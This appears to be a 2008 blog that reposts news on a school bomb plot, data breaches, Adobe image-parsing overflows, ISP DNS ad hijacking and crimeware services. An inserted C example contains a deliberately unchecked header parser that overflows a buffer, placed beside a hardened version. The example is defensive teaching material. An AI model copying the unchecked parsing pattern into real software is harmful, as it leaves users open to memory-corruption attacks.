A South Carolina teenager arrested for plotting to bomb his school had designs for an arsenal of explosives including a nail bomb that would have "devastated" students in a crowded hallway, a local police chief said today.

Ryan Schallenberger, 18, called his plot "Columbine III" and laid out details in a "bomb summary" that described the different types of explosives he would use in the suicide attack. He even recorded his expenses.

"I think he was more concerned about a high body count than killing anyone in particular," Chesterfield Police Chief Randall Lear told ABC News.

Schallenberger's "summary" contained details for a nail bomb.

"Inside a school, with confined concrete walls, just a little bit of nails, nuts and bolts, ball bearings and some of these explosives devices, it would devastate the student body," Lear said.

Authorities arrested Schallenberger on Saturday after a package arrived at his family's rural South Carolina home and his parents opened it to find 10 pounds of ammonium nitrate, a substance that can be used as an explosive when combined with diesel fuel or another accelerant.

The teen's parents called the police, and officers recovered the explosives material and found details of the high school senior's plot. Schallenberger, who was not at home at the time, was picked up along a dirt road near his house.

No guns or other weapons were found in the house.

"I can honestly tell you, were I faced with that scenario, I don't know if I could have made that decision," Lear said. "I don't know whether I would have been brave enough to do what these parents did."

Schallenberger, who had recently won a partial scholarship to college, said nothing and appeared agitated during a brief court appearance today, in which he was assigned a lawyer. The county prosecutor said he will ask that Schallenberger undergo a mental health evaluation.

The bomb summary found in the suspect's bedroom laid out a map of the school, the different types of explosives that would be used in the attack and specific materials needed for each.

While there was no date provided for the bombing, Lear said that with the shipment of ammonium nitrate, he had all the materials he would need to carry out the attack at his fingertips.

"This was a legitimate threat," Lear said. "Once that package was in, he had what he needed to formulate these explosives devices."

700K Hoosier ID's Compromised in Computer Theft

Via Pal-item.com -

INDIANAPOLIS -- A computer server containing Social Security numbers and other personal information of 700,000 people was stolen last month from a Southside debt-collection bureau in what appears to be the largest computer security breach ever in Indiana.

The information includes customer-billing records for about 100 Indiana businesses, including Citizens Gas & Coke Utility, St. Vincent Health and Methodist Medical Group.

The exposed data was limited to past-due billing information that had been turned over for debt collection to the Central Collection Bureau, the agency announced Friday. Customers whose accounts were in good standing were not affected.

The bureau collected overdue bills on behalf of dozens of Indiana companies, including hospitals, medical and dental offices, window companies, water-conditioning companies and flower shops.

"We're obviously heartsick about this," said Chet Klene, the collection agency's president. "We've been in business since 1972, and nothing like this has ever happened before."

He said the missing computer server contained personal billing information that was protected by two passwords but was not encrypted. He said the server had been stored behind three locked doors.

Klene said the break-in occurred on Good Friday, March 20. The first employee arriving at work that day noticed the break-in and immediately called the Indianapolis Metropolitan Police Department, which investigated but has not found the server. The collection agency has notified companies whose billing records have been compromised, Klene said.

Joan Antokol, a lawyer specializing in computer security at Baker & Daniels, an Indianapolis-based law firm, said the breach was the largest she had seen in Indiana. No larger breaches in Indiana are included among the hundreds of incidents listed on PrivacyRights.org, a national clearinghouse.

"It's a problem that continues to grow," Antokol said. "There are new cases reported all the time. It's a serious problem."

Still, this breach does not rank among the top dozen or so nationally. Retailer TJ Maxx reported that as many as 100 million accounts were compromised as a result of thefts and hack-ins since last year.

The U.S. Department of Veterans Affairs said information on more than 28 million veterans might have been exposed after a laptop was stolen from an employee's house in 2006. Monster.com, a Web-based job service, said information on more than 1 million job seekers had been stolen last year, containing names, addresses, phone numbers and e-mail addresses.

A spokesman for Citizens Gas said its missing records were past-due billing statements for 51,000 former customers that it was unable to find on its own. The information included names, last known addresses, Social Security numbers, dates of service and amount due.

Citizens has no way of notifying the former customers because their whereabouts are unknown, spokesman Dan Considine said.

"We certainly take this very seriously, any time there is a security breach, and we hope it gets cleared up very soon," he said.

St. Vincent Health said it had not given any billing business to Central Collection in more than three years, so all of the missing billing information is several years old. The stolen information included patient billing information for St. Vincent Hospital and affiliated physicians' practices, spokesman Johnny Smith said.

"We're committed to protecting confidential information of our patients. We regret any inconvenience to them," Smith said.

Billing records of about 62,000 patients of Methodist Medical Group, a physicians' group owned by Clarian Health, also were missing, as are the records of thousands of patients at Howard Regional Health System in Kokomo.

The break-in is being investigated by IMPD and the Indiana attorney general's office.

Space Workers Find Message In A Bottle And Decide To Answer It

Via efluxmedia.com -

What are the chances for a message in a bottle to be answered? Pretty high, if the sea is kind enough to bring it all the way from Bahamas to NASA’s Kennedy Space Center.

United Space Alliance worker Jill Vogel accidentally discovered the bottle while voluntarily cleaning the beach at the space center. The letter began "Dear sea penpal" and originated from a 9-year-old girl from Holy Name Catholic School in Bimini.

As it appears, every year on Columbus Day (which celebrates Columbus’ arrival in the Americas), the girl takes part in a class project: she and her classmates send messages in bottles out to sea, hoping someone would find them and answer them.

“What a cool thing for a kid,” said Vogel, as quoted by Local 6 News.

The letter was apparently written in October, but it’s never too late to answer, and the workers at the United Space Alliance decided to surprise her by responding to her wish: “I hope you respond to my letter,” the little girl wrote.

Vogel and her colleagues sent back to the Bahamas space memorabilia, including crew photos, pins, stickers and information about astronauts. NASA, Keep Brevard Beautiful and Wildlife Refuge contributed items as well.

The package was sent by mail (to make sure it gets there) and all those who contributed to it are excited and can’t wait for the package to reach its destination.

Baker College wins National Collegiate Cyber Defense Competition

Via Linux.com -

Baker College of Flint, Mich., defeated defending champion Texas A&M University and four other regional winners from across the country to capture the third annual National Collegiate Cyber Defense Competition, which concluded in San Antonio, Texas, over the weekend. Texas A&M finished a close second, and the University of Louisville took third. Also competing for the championship were the Community College of Baltimore County, Mount San Antonio College of Los Angeles County, and the Rochester Institute of Technology.

Hosted by the Center for Infrastructure Assurance and Security (CIAS) at the University of Texas at San Antonio (UTSA), the event pits six regional winners, each given a similar small enterprise network to protect, against a team made up of experienced security professionals dubbed the Red Team, a.k.a. Team Hilarious.

Teams are scored on how well they protect their identical networks, made up of a Cisco router and five servers: Windows 2003 running Internet Information Services, Windows 2000 running DNS, Solaris X86 running Apache and OpenSSL, Gentoo running MySQL and NFS, and BSD running Sendmail. Team workstations can run Vista, Windows, Fedora, or BSD, as the team prefers. Teams are required to provide SMTP, POP3, HTTP, HTTPS, and DNS services throughout the competition, and outages on any of those services result in deductions from their score. At specified times, the teams are also asked to bring up FTP, SSH, RDP, and VNC services, in accordance with the 2008 competition rules.

In addition to the attackers (the Red Team) and the defenders (the Blue Teams), there is also a White Team. The White Team acts as the overall network operations center, observers, and as communications center. All requests for information, assistance, and problem reporting by the competing teams go through the White Team; teams are not allowed direct communication with the outside world except for publicly available information and software available on the Internet. The White Team also delivers in-competition requests for new services and scores the teams' performance.

...

In addition to a few members of the press, the Red Team room was also visited by various federal agents. A contingent from the Secret Service was present all weekend. Three black-suited gentlemen claiming to be from the FBI were present Friday. Defense Information Systems Agency agents were present as part of the competition infrastructure, and among their other duties, helped escort journalists from room to room during the event.

...

Baltimore County Community College, the only team with a female competitor, and Mount San Antonio Community College in Los Angeles proved that network security skills are not the exclusive domain of larger, better-known institutions. Their presence at this national competition is roughly the equivalent of a community college basketball team making it to the NCAA's Final Four, and both schools and students deserve kudos for going head to head against teams from much larger schools, especially since those schools may include two graduate students on their team.

Dr. Gregory White, director of the UTSA CIAS, one of the founders of the original competition when it was held on a regional basis rather than nationally, explained there is a large network and computer security population in San Antonio, primarily because the Air Intelligence Agency is located there. UTSA was a logical place to become an academic center for computer and network security. That led to it becoming the first Texas university to be designated as a "Center for Academic Excellence in Information Assurance Education" by both the DHS and the National Security Agency, and it currently offers bachelor's and master's-level degrees in information security from several of its schools.

Sponsors for this year's event included the AT&T Foundation, DHS, Cisco Systems, Acronis, Northrop Grumman, Accenture, the Information Systems Security Association, Core Security, our sister site ThinkGeek, Code Magazine, and Pepsi. White said that more sponsors are needed for future competitions in order to do all the things CIAS wants to accomplish.

---------------------------

I agree with my fellow Texan, Joe Barr.

The word "Cyber" does sound very 90s.

Which reminds me, AMC tomorrow night... Wargames is on, 25 years later.

Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit

Exploitable issue in various Adobe products
c0ntex (c0ntexb@gmail.com) Scott Laurie
February 2008

Vulnerable applications, tested:
Adobe Photoshop Album Starter
Adobe After Effects CS3
Adobe Photoshop CS3

Not Vulnerable applications, tested:
Adobe Reader
Adobe Flash Player

This bug is related to the parsing of header images, in that the applications do not verify that the image header is valid before trying to render it. This leaves an opportunity to cause an unchecked buffer overflow and allow for the execution of malicious code.

All the issues are standard local overflows whereby an attacker can exploit a machine after sending the malicious image to the user, or by placing the image on a web site or email and waiting for a user to view it in one of the affected products.

One fun thing with Album Starter is that it will run a service which will look for new devices being attached to the system, things like cameras or USB drives and when one is found it will check the device for image files. If some are found, the application will auto-run and import the images and thus allow the attacker to exploit locked workstations.. pretty lame but fun :)

http://www.milw0rm.com/exploits/5479
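An added illustration of the bug class the advisory describes, in C, written for this page rather than taken from the advisory or from Adobe: a toy image format whose header declares the pixel dimensions, the unchecked renderer that trusts those fields, and a hardened renderer that validates the header before copying anything. The IMG1 format, the buffer sizes and the function names are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed toy format (an assumption for this example, not any Adobe
 * format): "IMG1" magic, little-endian uint32 width and height, one byte
 * bits-per-pixel, then width*height*bpp/8 pixel bytes. */
#define HDR_LEN    13
#define PIXBUF_LEN 4096      /* fixed render buffer, as in the bug class described */
#define MAX_DIM    64        /* largest width/height the renderer supports */

struct image {
    uint32_t width, height;
    uint8_t  bpp;
    size_t   pixel_len;
    uint8_t  pixels[PIXBUF_LEN];
};

static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* The pattern the advisory describes: the header is trusted as-is, so a
 * width/height pair that implies more pixel bytes than the buffer holds
 * drives memcpy past the end of img->pixels. Shown for contrast only;
 * never feed it untrusted input. */
int render_unchecked(const uint8_t *buf, size_t len, struct image *img) {
    if (len < HDR_LEN) return -1;
    img->width     = rd_le32(buf + 4);
    img->height    = rd_le32(buf + 8);
    img->bpp       = buf[12];
    img->pixel_len = (size_t)img->width * img->height * img->bpp / 8;   /* unchecked */
    memcpy(img->pixels, buf + HDR_LEN, img->pixel_len);                 /* CWE-120 */
    return 0;
}

/* Hardened: every header field is validated before a single byte is copied.
 * Return codes: 0 ok, -1 short/bad magic, -2 bad dimensions, -3 bad depth,
 * -4 exceeds render buffer, -5 file shorter than the header claims. */
int render_checked(const uint8_t *buf, size_t len, struct image *img) {
    if (len < HDR_LEN || memcmp(buf, "IMG1", 4) != 0) return -1;
    uint32_t w = rd_le32(buf + 4), h = rd_le32(buf + 8);
    uint8_t bpp = buf[12];
    if (w == 0 || h == 0 || w > MAX_DIM || h > MAX_DIM) return -2;
    if (bpp != 8 && bpp != 24 && bpp != 32) return -3;
    /* w and h are capped at MAX_DIM, so this product cannot wrap; with
     * larger caps you would test w > SIZE_MAX / h / (bpp / 8) first. */
    size_t need = (size_t)w * h * (bpp / 8);
    if (need > PIXBUF_LEN) return -4;          /* destination bound */
    if (need > len - HDR_LEN) return -5;       /* source bound (truncated input) */
    img->width = w; img->height = h; img->bpp = bpp; img->pixel_len = need;
    memcpy(img->pixels, buf + HDR_LEN, need);
    return 0;
}

/* Build a constructed sample image and run it through render_checked.
 * pixel_bytes is how many pixel bytes really follow the header, which may be
 * fewer than the header implies; bad_magic corrupts the signature. */
int check_sample(uint32_t w, uint32_t h, uint8_t bpp, size_t pixel_bytes, int bad_magic) {
    static uint8_t buf[HDR_LEN + PIXBUF_LEN];
    static struct image img;
    if (pixel_bytes > sizeof buf - HDR_LEN) return -100;
    memcpy(buf, bad_magic ? "XXXX" : "IMG1", 4);
    wr_le32(buf + 4, w);
    wr_le32(buf + 8, h);
    buf[12] = bpp;
    memset(buf + HDR_LEN, 0xAB, pixel_bytes);
    return render_checked(buf, HDR_LEN + pixel_bytes, &img);
}

int main(void) {
    printf("16x16x8, 256 bytes -> %d\n", check_sample(16, 16, 8, 256, 0));   /* 0  */
    printf("64x64x32 header    -> %d\n", check_sample(64, 64, 32, 0, 0));    /* -4 */
    printf("16x16x8, 100 bytes -> %d\n", check_sample(16, 16, 8, 100, 0));   /* -5 */
    return 0;
}
```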

Microsoft: Finding Flaws On Our Website is OK

Via The Register UK -

In a first for a major company, Microsoft has publicly pledged not to sue or press charges against ethical hackers who responsibly find security flaws in its online services.

The promise, extended Saturday at the ToorCon security conference in Seattle, is a bold and significant move. While researchers are generally free to attack legally acquired software running on their own hardware, they can face severe penalties for probing websites that run on servers belonging to others. In some cases, organizations have pursued legal action against researchers who did nothing more than discover and responsibly report serious online vulnerabilities.

"This is actually really important because online services - that's our stuff," Microsoft security strategist Katie Moussouris told several hundred researchers. "The philosophy here is if someone is being nice enough to point out your fly is down, they're really doing you a favor and you should thank them rather than calling the cops and saying you're a pervert."

Moussouris said she is pushing to get a provision added to a proposed standard that's making its way through the International Organization for Standardization that would protect ethical hackers who responsibly disclose vulnerabilities in other companies' websites. "If I get my way, it'll be in there," she said.

(In a brief exchange after her talk, Moussouris told us she didn't know offhand exactly how the proposed standard was designated. We're guessing it's this one, though we can't be sure.)

The idea is to make websites safer by taking advantage of the legions of independent researchers who stumble upon security bugs. As she put it: "Don't hate the finder, hate the vulnerability. We don't actually want to discourage people who are trying to help us by being iffy about whether we're going to go after them."

As things stand, researchers frequently turn a blind eye to gaping security holes on websites for fear of suffering a fate similar to that of Eric McCarty. The prospective student at the University of Southern California found a flaw in the school's online application system that gave him access to other applicants' records. In 2006, he was charged with computer intrusion after producing proof of his finding.

"There's definitely a lot of trepidation among legitimate researchers to find flaws in public-facing web applications because you never know how [companies] are going to react," said Alex Stamos, a founding partner at iSEC Partners, a firm that provides penetration-testing services. "That hurts us because the only people finding these flaws are the bad guys."

-----------------------

Kudos to Microsoft.

Sunday, April 20, 2008

Why the Flu Vaccine Fizzled

Via NYTimes.com -

Anyone who dutifully got a flu vaccination this year only to come down with a serious fever, chills or cough had plenty of company. An analysis issued last week by the Centers for Disease Control and Prevention estimated that this year’s vaccine formulation was only 44 percent effective. That feeble performance, along with the virulence of one of the strains, made the flu season much worse than the previous three.

Not all of the news is bad. In a separate report, scientists tracked the previously mystifying origins and pathways of influenza viruses. Such information should help them make better vaccines.

What makes flu so hard to prevent is that the virus changes its molecular structure from year to year. Each year, experts try to guess which strains found anywhere in the world are apt to circulate in this country in the next flu season. They then formulate a vaccine to protect against those strains.

When they guess right, as is usually the case, the vaccine can be 70 to 90 percent effective in healthy adults. When they guess wrong, as happened this year, the mismatch leaves many recipients vulnerable.

This year’s vaccine was designed to protect against two strains of influenza A and one strain of influenza B. Based on an analysis in central Wisconsin, the vaccine proved 58 percent effective against the predominant A strain but totally ineffective against the B strain.

In research that could improve the likelihood of picking the right strains, an international team led by British scientists has documented — through molecular and genetic analysis — how seasonal flu strains evolve and sweep around the world. It turns out that new flu strains emerge in several countries in East and Southeast Asia, and are then carried by travelers to Europe and North America some six to nine months later. Several months after that they reach South America, where they die out. Then the whole process starts over.

Although scientists knew generally that influenza strains often emerge from in and around China, the new research expands the area that bears watching and surely bolsters the case for greatly enhanced surveillance in Asia. With any luck, that would lead to better and earlier identification of the strains that will be circulating — the key to making an effective vaccine.

DARPA Seeks Architecture-Aware Compilers

Via GCN.com -

The Defense Advanced Research Projects Agency is looking for smarter compilers — specifically, the agency is looking to fund development of compilers that can dynamically optimize programs for the specific environments in which they will run, according to a broad area announcement just released by the agency.

"The goal of DARPA’s envisioned Architecture-Aware Compiler Environment [AACE] Program is to develop computationally efficient compilers that incorporate learning and reasoning methods to drive compiler optimizations for a broad spectrum of computing system configurations," BAA 08-30 states.

Today's compilers were written under the assumption that the programs they create will run on single-processor systems, the document states. Yet the Defense Department is running programs across an ever-widening array of systems, from small embedded computers to clustered systems with thousands of processors. Tuning a program to run under unusual environments tends to be a lengthy and manual process. DARPA would like to automate much of the work associated with this task.

"An architecture[-]aware compiler should ... be able to significantly reduce the number of feedback loops required to achieve major performance improvements," the BAA states.

What DARPA is seeking is a new generation of compilers that can incorporate performance-tuning modules. When compiling application code, such compilers would consult static files (generated by a characterization program) that describe the environment in which that program will run. This compiler-of-the-future will then optimize its program for that specific environment, using not only this static characterization data but also dynamic data taken directly from the system itself.

"The runtime system will collect performance data in a knowledge database that can be reused by other applications that are executed on the system," the BAA states. DARPA also suggests that the compiler will need reasoning mechanisms in order to know what to do with this static and dynamic performance data.

The BAA only mentioned the C and Fortran programming languages as possible candidates for which compilers could be written. It does, however, encourage work in those languages that support techniques for parallelization of programs, such as the Message Passing Interface and OpenMP interface, and any languages using the Partitioned Global Address Space, such as Parallel C.

DARPA's Information Processing Techniques Office issued the BAA. Companies and research institutions have until June 2 to submit their initial proposals for consideration of funding.

The BAA did not disclose the amount DARPA plans to spend on this effort, stating that the amount will depend on the quality of the proposals received. The BAA does present a road map to fund this work at least through 2011.

US Gov Opens Wireless Systems Testing Lab

Via GCN.com -

Government defense and intelligence agencies have taken the wraps off a lab opened in the first quarter of this year for testing and evaluating wireless systems that transmit classified data.

The lab, developed by systems integrator Lockheed Martin, allows the agencies to test 802.11 Wi-Fi or broadband satellite links on a top-secret/sensitive compartmented information network.

The agencies will be able to test a broad spectrum of wireless networks, including Bluetooth, 802.16 WiMax, cell phones, and Ku- and C-band satellite communications. The lab is sealed and reinforced to ensure that signals from the systems stay within the chamber.

The Wireless Cyber Security Center, based in Hanover, Md., will allow agencies to define and evaluate wireless security strategies, policies and concepts of operation. The facility also will support projects to evaluate next-generation security technologies and assess vulnerabilities. Officials can also use the installation to evaluate mobile ad-hoc networks, which play an increasing role in battlefield communications.

Government agencies already are using the lab to conduct vulnerability testing, said Lockheed Martin spokesman Matt Kramer. Results from the lab and the processes are secured, and they can potentially be labeled top secret, he said.

“We provide an actual classified environment using those technologies…. You can simulate it, but it’s no substitute for the real thing.” Testing these technologies over an actual network would potentially expose risks, Kramer said.

Wireless networks in use by the government today are not necessarily connected to a classified network, said Kramer. Defense and intelligence agencies are interested in testing these wireless networks to potentially transfer top-secret information over them.

The lab is one of only a handful capable of testing commercial wireless cybersecurity, said Kramer.

ISPs' Error Page Ads Let Hackers Hijack Entire Web

Via Wired.com -

Seeking to make money from mistyped website names, some of the United States' largest ISPs instead created a massive security hole that allowed hackers to use web addresses owned by eBay, PayPal, Google and Yahoo, and virtually any other large site.

The vulnerability was a dream scenario for phishers and cyber attackers looking for convincing platforms to distribute fake websites or malicious code. The hole was quickly and quietly patched Friday after IOActive security researcher Dan Kaminsky reported the issue to Earthlink and its technology partner, a British ad company called Barefruit. Earthlink users, and some Comcast subscribers, were at risk.

Kaminsky warns that the underlying danger lingers on.

"The entire security of the internet is now dependent on some random-ass server run by some British company," Kaminsky said.

At issue is a growing trend in which ISPs subvert the Domain Name System, or DNS, which translates website names into numeric addresses.

When users visit a website like Wired.com, the DNS system maps the domain name into an IP address such as 72.246.49.48. But if a particular site does not exist, the DNS server tells the browser that there's no such listing and a simple error message should be displayed.

But starting in August 2006, Earthlink instead intercepts that Non-Existent Domain (NXDOMAIN) response and sends the IP address of ad-partner Barefruit's server as the answer. When the browser visits that page, the user sees a list of suggestions for what site the user might have actually wanted, along with a search box and Yahoo ads.

The rub comes when a user is asking for a nonexistent subdomain of a real website, such as http://webmale.google.com, where the subdomain webmale doesn't exist (unlike, say, mail in mail.google.com). In this case, the Earthlink/Barefruit ads appear in the browser, while the title bar suggests that it's the official Google site.

As a result, all those subdomains are only as secure as Barefruit's servers, which turned out to be not very secure at all. Barefruit neglected basic web programming techniques, making its servers vulnerable to a malicious JavaScript attack. That meant hackers could have crafted special links to unused subdomains of legitimate websites that, when visited, would serve any content the attacker wanted.

The hacker could, for example, send spam e-mails to Earthlink subscribers with a link to a webpage on money.paypal.com. Visiting that link would take the victim to the hacker's site, and it would look as though they were on a real PayPal page.
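The check a network defender would run against the rewriting described above, as an added example in C that is not part of the Wired article: it parses two constructed resolver replies for random labels under unrelated domains and flags the resolver when both come back NOERROR with the same A record instead of NXDOMAIN. The query names, the 198.51.100.7 address and the function names are constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define RCODE_NOERROR  0
#define RCODE_NXDOMAIN 3

/* Encode "a.b.c" as DNS labels; returns bytes written. */
static size_t put_name(uint8_t *out, const char *name) {
    size_t n = 0;
    while (*name) {
        const char *dot = strchr(name, '.');
        size_t l = dot ? (size_t)(dot - name) : strlen(name);
        out[n++] = (uint8_t)l;
        memcpy(out + n, name, l); n += l;
        name += l + (dot ? 1 : 0);
    }
    out[n++] = 0;
    return n;
}

/* Build a constructed resolver reply to an A query for name. With RCODE_NOERROR and a
 * non-NULL ip one A record is appended, using a compression pointer (0xC00C) to the question. */
size_t build_response(uint8_t *out, const char *name, int rcode, const uint8_t *ip) {
    int answers = (rcode == RCODE_NOERROR && ip) ? 1 : 0;
    uint8_t hdr[12] = { 0x12, 0x34, 0x81, (uint8_t)(0x80 | rcode),   /* ID; QR=1 RD=1; RA=1 RCODE */
                        0, 1, 0, (uint8_t)answers, 0, 0, 0, 0 };    /* QDCOUNT=1, ANCOUNT, 0, 0 */
    memcpy(out, hdr, 12);
    size_t n = 12 + put_name(out + 12, name);
    const uint8_t qtail[4] = { 0, 1, 0, 1 };                          /* QTYPE A, QCLASS IN */
    memcpy(out + n, qtail, 4); n += 4;
    if (answers) {
        const uint8_t rr[12] = { 0xC0, 0x0C, 0, 1, 0, 1, 0, 0, 0, 60, 0, 4 }; /* ptr, A, IN, TTL 60, RDLEN 4 */
        memcpy(out + n, rr, 12); n += 12;
        memcpy(out + n, ip, 4); n += 4;
    }
    return n;
}

/* Skip a possibly compressed name; returns the next offset, or 0 if malformed. */
static size_t skip_name(const uint8_t *p, size_t len, size_t off) {
    while (off < len) {
        uint8_t l = p[off];
        if (l == 0) return off + 1;
        if ((l & 0xC0) == 0xC0) return (off + 2 <= len) ? off + 2 : 0;  /* pointer ends the name */
        off += 1 + l;
    }
    return 0;
}

/* Parse a reply: returns RCODE (0..15) or -1 if malformed. Copies the first
 * A record's address into ip_out and sets *has_a when one is present. */
int parse_reply(const uint8_t *p, size_t len, uint8_t *ip_out, int *has_a) {
    *has_a = 0;
    if (len < 12 || !(p[2] & 0x80)) return -1;            /* too short, or not a response */
    int rcode = p[3] & 0x0F;
    unsigned qd = (p[4] << 8) | p[5], an = (p[6] << 8) | p[7];
    size_t off = 12;
    for (unsigned i = 0; i < qd; i++) {
        off = skip_name(p, len, off);
        if (!off || off + 4 > len) return -1;
        off += 4;                                           /* QTYPE, QCLASS */
    }
    for (unsigned i = 0; i < an; i++) {
        off = skip_name(p, len, off);
        if (!off || off + 10 > len) return -1;
        unsigned type  = (p[off] << 8) | p[off + 1];
        unsigned rdlen = (p[off + 8] << 8) | p[off + 9];
        off += 10;                                          /* TYPE, CLASS, TTL, RDLENGTH */
        if (off + rdlen > len) return -1;
        if (type == 1 && rdlen == 4 && !*has_a) { memcpy(ip_out, p + off, 4); *has_a = 1; }
        off += rdlen;
    }
    return rcode;
}

/* 1 = rewriting suspected: both replies, for random labels under unrelated domains, are
 * NOERROR with the same A record. 0 = honest NXDOMAIN or differing answers. -1 = malformed. */
int nxdomain_rewritten(const uint8_t *r1, size_t l1, const uint8_t *r2, size_t l2) {
    uint8_t ip1[4], ip2[4]; int a1, a2;
    int rc1 = parse_reply(r1, l1, ip1, &a1), rc2 = parse_reply(r2, l2, ip2, &a2);
    if (rc1 < 0 || rc2 < 0) return -1;
    if (rc1 == RCODE_NXDOMAIN || rc2 == RCODE_NXDOMAIN) return 0;
    return (a1 && a2 && memcmp(ip1, ip2, 4) == 0) ? 1 : 0;
}

/* Run the check over constructed replies; 198.51.100.7 is a documentation-range placeholder. */
int check_constructed_replies(int honest_resolver) {
    static const uint8_t ad_ip[4] = { 198, 51, 100, 7 };
    uint8_t r1[128], r2[128];
    int rc = honest_resolver ? RCODE_NXDOMAIN : RCODE_NOERROR;
    const uint8_t *ip = honest_resolver ? NULL : ad_ip;
    size_t l1 = build_response(r1, "x7q3z9.example.com", rc, ip);
    size_t l2 = build_response(r2, "k2m8p1.example.net", rc, ip);
    return nxdomain_rewritten(r1, l1, r2, l2);
}
```

Against a live resolver the same logic applies to the replies for two freshly generated labels; a single NOERROR answer for a name you know does not exist is already a strong sign.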

Finjan Exposes Website Running Crimeware as a Service (CAAS)

Via Register UK -

Security researchers have uncovered a new web-based service containing security credentials for more than 8,700 websites belonging to Fortune 500 companies and government agencies. It allows miscreants to infect some of the internet's most popular destinations with a few clicks of the mouse.

According to security provider Finjan, the service categorizes the list of available sites by a variety of characteristics, including the country where they're hosted and their popularity. After paying a fee, criminals can select the domain they want to compromise and then use it as a means to infect vulnerable machines that later visit the site.

The service provides a menu of malware titles that can be pushed to unwitting visitors. It also allows miscreants to upload custom exploits, according to Yuval Ben-Itzhak, chief technology officer at Finjan.

In a sense, this crimeware as a service (CAAS) was inevitable. According to an earlier report from Finjan, more than 51 percent of websites that pushed malicious content in the second half of 2007 were legitimate destinations that had been commandeered by bad guys. The service is evidence that there's money to be made in automating that process - and one more sign that cyber-crime has grown into a full-fledged business where no opportunity to turn a profit is passed up.

"You can imagine the magnitude of this marketplace now," he said in an interview. "They really commercialize everything in this eco-system."

About 10 of the compromised sites are among the 100 most popular internet destinations as measured by Alexa.com. Another 100 are ranked in the top 100 to 500. Sites include some of the world's more elite organizations, including companies in the financial services, manufacturing and technology industries. They also include government agencies, including at least one belonging to a superior court in the US. Most of the sites are located in the US. Other origins included the Russian Federation, Australia, Ukraine, the Czech Republic and the UK.

Ben-Itzhak declined to identify the sites by name. He said Finjan has so far alerted only about a dozen of the compromised sites. Companies that want to find out if they're on the list can contact a Finjan representative using this link.

The service is able to seamlessly infect the websites because it has a database containing file transfer protocol usernames, passwords and server addresses that are typically used by legitimate webmasters to add, change or delete pages. The credentials were most likely stolen by infecting the PCs of administrators with keyloggers, Ben-Itzhak said.

A site called meoryprof.info has been used to access the service. At the time of writing, it was inaccessible to us. As long as the FTP credentials remain valid, you can bet it's only a matter of time before the service pops up on another site.

Indonesia Arrests Two JI Members

Via Reuters India -

Indonesia has arrested two more members of Islamic militant group Jemaah Islamiah (JI), a senior police official told Reuters, which could lead to the arrest of other key militants wanted for attacks in Southeast Asia.

In particular, the police official said the arrests could help lead to the capture of Noordin Mohammad Top, one of the most senior members of Jemaah Islamiah who is still on the run.

The two men -- Abdul Rohim, who also uses the name Abu Husna, and a man identified only as Agus -- were caught in Malaysia more than two weeks ago and have been transferred to a detention centre in Jakarta, according to the police official in Jakarta, who declined to be identified by name.

Abu Husna "is a member of the markaziah, the central board of the organisation," the police official said, while the man identified as Agus was involved in attacks in Sulawesi and Java, and has close links to Abu Dujana, the military commander of Jemaah Islamiah, he added.

Sidney Jones, an expert on the Jemaah Islamiah at the Brussels-based think-tank, the International Crisis Group, said Abu Husna is believed to have replaced Zarkasih as the head of JI, after Zarkasih was arrested last year in Indonesia.

"Abu Husna is a central figure in the organisation and he would know everything about the current activities, command structure and so on," said Jones, who is based in Jakarta.

Abu Husna has previously been the JI central command's head of education, overseeing some two dozen or so JI schools across Indonesia, according to Jones.

The other man who was arrested could be Agus Purwanto, Jones said, adding that he had studied at the famous Islamic boarding school run by the controversial cleric, Abu Bakar Bashir, in Solo, central Java. Bashir was jailed for 30 months for conspiracy over the Bali bombings but was later cleared.

Chinese Troops On The Streets of Zimbabwean City

Via Independent.co.uk -

Chinese troops have been seen on the streets of Zimbabwe's third largest city, Mutare, according to local witnesses. They were seen patrolling with Zimbabwean soldiers before and during Tuesday's ill-fated general strike called by the opposition Movement for Democratic Change (MDC).

Earlier, 10 Chinese soldiers armed with pistols checked in at the city's Holiday Inn along with 70 Zimbabwean troops.

One eyewitness, who asked not to be named, said: "We've never seen Chinese soldiers in full regalia on our streets before. The entire delegation took 80 rooms from the hotel, 10 for the Chinese and 70 for Zimbabwean soldiers."

Officially, the Chinese were visiting strategic locations such as border posts, key companies and state institutions, he said. But it is unclear why they were patrolling at such a sensitive time. They were supposed to stay five days, but left after three to travel to Masvingo, in the south.

China's support for President Mugabe's regime has been highlighted by the arrival in South Africa of a ship carrying a large cache of weapons destined for Zimbabwe's armed forces. Dock workers in Durban refused to unload it.

The 300,000-strong South African Transport and Allied Workers Union (Satawu) said it would be "grossly irresponsible" to touch the cargo of ammunition, grenades and mortar rounds on board the Chinese ship An Yue Jiang anchored outside the port.

A Satawu spokesman Randall Howard said: "Our members employed at Durban container terminal will not unload this cargo, neither will any of our members in the truck-driving sector move this cargo by road. South Africa cannot be seen to be facilitating the flow of weapons into Zimbabwe at a time where there is a political dispute and a volatile situation between Zanu-PF and the MDC."

Three million rounds of AK-47 ammunition, 1,500 rocket-propelled grenades and more than 3,000 mortar rounds and mortar tubes are among the cargo on the Chinese ship, according to copies of the inventory published by a South African newspaper.

Saturday, April 19, 2008

RumorMill: Windows XP Service Pack 3 Coming Soon

Via SANS ISC -

Information Week and Neowin.net are reporting that Windows XP Service Pack 3 may be showing up at the end of this month. OEMs and MSDN/Technet subscribers will apparently have access on the 21st, with release to Windows Update on the 29th.

http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207200856

This is an unofficial report - we do not have confirmation from Microsoft for this.

Sudanese Gov Continues to Censor Private Media

Via RSF.org -

Reporters Without Borders called on the Sudanese government today to lift its almost three-month censorship of the privately-owned press in Khartoum which has intensified in recent days with the seizure of six daily newspapers.

"These are the most serious press freedom violations since the 2005 peace agreement that was supposed to end emergency laws,” the worldwide press freedom organisation said. “Secret police surveillance of newspaper staff is outrageous and illegal and the national unity government must put a stop to it. The media, one of the better aspects of modern Sudan, is being punished without reason and in violation of the national constitution.”

